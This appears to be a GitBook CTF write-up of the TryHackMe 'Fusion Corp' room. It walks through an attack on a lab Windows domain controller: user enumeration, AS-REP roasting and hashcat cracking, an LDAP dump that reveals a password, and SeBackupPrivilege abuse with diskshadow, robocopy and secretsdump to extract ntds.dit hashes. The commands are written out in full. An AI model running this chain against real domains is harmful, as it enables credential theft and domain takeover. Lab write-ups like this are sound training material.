Practice
  • 🛤️TryHackMe Rooms
    • HackersVsHackers
    • Vulnnet - The End Game
    • Surfer
    • Corridor
    • Mustacchio
    • Wordpress: CVE-2021-29447
    • Bounty Hacker
    • Simple CTF
    • Agent Sudo
    • Lazy Admin
    • Ignite
    • Brooklynn 99
    • c4ptur3th3fl4g
    • Lian_Yu
    • Rabbit
    • Gallery
    • Overpass
    • Team
    • Easy Peasy
    • CmesS
    • Ultratech
    • Wonderland
    • Anonymous
    • GamingServer
    • Tomghost
    • ConvertMyVideo
    • DogCat
    • Blog
    • Git Happens
    • 0day
    • Road
    • Inferno
    • Opacity
    • Market Place
    • Valley CTF
    • Weasel
    • SafeZone
    • Blueprint
    • Fusion Corp
    • Quotient
    • Unbaked Pie
    • Kenobi
    • Steel Mountain
    • Alfred
    • Hack Park
    • Game Zone
    • Daily Bugle
    • Retro
    • Corp
    • Attacktive Directory
    • Vulnnet - Roasted
    • Vulnnet - Active
    • Vulnnet - Internal
    • Enterprise - Hard
    • Iron Corp - Hard
    • Ra - Hard
    • For Business Reasons
  • 📦HackTheBox
    • Linux Boxes
      • Lame
      • Shocker
      • Nibbles
      • Beep
      • Cronos
      • Nineveh
      • Sense
      • Solidstate
      • Node
      • Valentine
      • Poison
      • Sunday
      • Irked
      • FriendZone
      • Networked
      • Jarvis
      • Tabby
      • Mirai
      • Popcorn
    • Windows Boxes
      • Active
      • Forest
      • ChatterBox
      • Resolute
      • Intelligence
  • 🤖CTF's
    • CloudSEK CTFs
    • ACM Cyber - UCLA
  • ¯\_(ツ)_/¯
    • Interview Topics
  • 🪣BOF - OSCP
    • Basics
    • Spiking
    • FUZZing
    • Finding the Offset
    • Overwriting the EIP
    • Finding BAD Characters
    • Finding RIGHT Module
    • Generating Shellcode
  • 📛Active Directory
    • Basics
      • Managing AD Users
      • Managing AD Computers
      • Group Policies
      • Authentication Methods
      • Trees, Forests and Trusts
    • Enumeration Techniques
    • Initial Attack Vectors
    • Post Compromise Enumeration
    • Post Compromise Attacks
      • Token Impersonation - LM
      • Kerberoasting
      • cPassword / GPP Attack
      • URL File Attacks
      • PrintNightmare
      • Golden Ticket Attacks
      • ZeroLogon Attacks
    • Lateral Movement and Pivoting
      • File Transfers
      • Spawning Processes Remotely
      • Moving Laterally with WMI
      • Alternate Authentication Material
      • Abusing User's Behaviour
      • Port Forwarding
      • Maintaing Access
      • Pivoting
      • Cleaning Up
    • Other Resources
  • 🛡️Powershell Basics
    • Getting Started
      • Functions
  • 😁Others
    • API Security
    • Cloud Security
  • Enumeration
    • Local PrivEsc
    • Remoting
    • Persistence
    • Kerberos
Powered by GitBook
On this page
  • Scanning
  • Initial Foothold - 1
  • Initial Foothold - 2
  • Lateral Move - 1
  • Lateral Move - 2
  • Privilege Escalation - 1
  • Privilege Escalation - 2
  1. TryHackMe Rooms

Fusion Corp

AS-REP Roasting - Authenticated LDAP Domain Dump - SeBackupPrivilege and SeRestorePrivilege abuse

Scanning

Starting off with the nmap scan

sudo nmap 10.10.75.130 -sS -sV -p-

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-06-20 13:33:25Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Initial Foothold - 1

Finding Usernames

./kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d fusion.corp --dc 10.10.7.24 -v | grep 'VALID USERNAME:'

Let's try some AS-REP roasting attacks using impacket-GetNPUsers module 

python2 GetNPUsers.py <Domain>/ -usersfile <File> -format hashcat -outputfile <File>

Viewing the output file

Let's now crack it via hashcat

hashcat -m 18200 -a 0 asrep-hashes /usr/share/wordlists/rockyou.txt

We are then able to utilize the credentials against port 5985 with Evil-WinRM

evil-winrm -i 10.10.22.38 -u lparker -p '<Password>'

Initial Foothold - 2

As port 80 was open I used “dirb” command to see if there was some useful folder. So I found “backup” folder in which there was a file named “employees.ods”

I downloaded and open it. It contains a users table

Now we can utilize the AS-REP roasting attack and move forward !

Lateral Move - 1

Viewing the jmurphy user's comment reveals us the password of the respective user

net user jmurphy

Lateral Move - 2

After obtaining the lparker's credentials we can perform an authenticated LDAP Domain dump which in return gives us the data in .json files

ldapdomaindump 10.10.137.66 -u 'fusion.corp\lparker' -p '!!<REDACTED>'

Got many files including one interesting file (domain_users.html) which contains users SAM Name and in one user (jmurphy) there was his password !

Privilege Escalation - 1

Querying out whoami /priv returns us

As we can see we have SeBackupPrivilege enabled ! - So how do we abuse it ?

This privilege grants us the ability to create backups of files on the system - A high value file would be the ntds.dit file which is a database of hashes for domain objects / users

As the ntds.dit file is in constant use we will be unable to create a backup using normal methods as the system will lock the file

Instead we can create a Distributed Shell File (DSH) - This file will contain the appropriate commands for us to run the diskshadow.exe utility against the C: drive and ultimately the ntds.dit file

  • Create a viper.dsh file on the attacker's machine with the following contents

set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:

Once completed use the command unix2dos to convert the file to DOS format

unix2dos viper.dsh

Then on the target system create a directory called 'temp' in c:\temp - After this upload the viper.dsh file

diskshadow /s viper.dsh
robocopy /b x:\windows\ntds . ntds.dit

From here we need to extract the SYSTEM hive which will be required for extracting the hashes

reg save hklm\system c:\Temp\system

Download the files on your attacker's machine now

download ntds.dit
download system

Now use the secretsdump to extract the hashes !

python2 secretsdump.py -ntds ntds.dit -system system local

We can now evil-winrm or psexec into the box as Administrator :)

Privilege Escalation - 2

Running whoami /privs I saw that jmurphy has SeBackupPrivilege and SeRestorePrivilege enabled

Copy the .dlls onto the victim's machine and import them 

Import-Module C:\Users\jmurphy\Documents\SeBackupPrivilegeUtils.dll
Import-Module C:\Users\jmurphy\Documents\SeBackupPrivilegeCmdLets.dll

We can now abuse it and get the Administrator's flag but not the shell !

Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\flag.txt C:\Users\jmurphy\Documents\flag.txt
PreviousBlueprintNextQuotient

Last updated 1 year ago

🛤️
LogoGitHub - giuliano108/SeBackupPrivilege: Use SE_BACKUP_NAME/SeBackupPrivilege to access objects you shouldn't have access toGitHub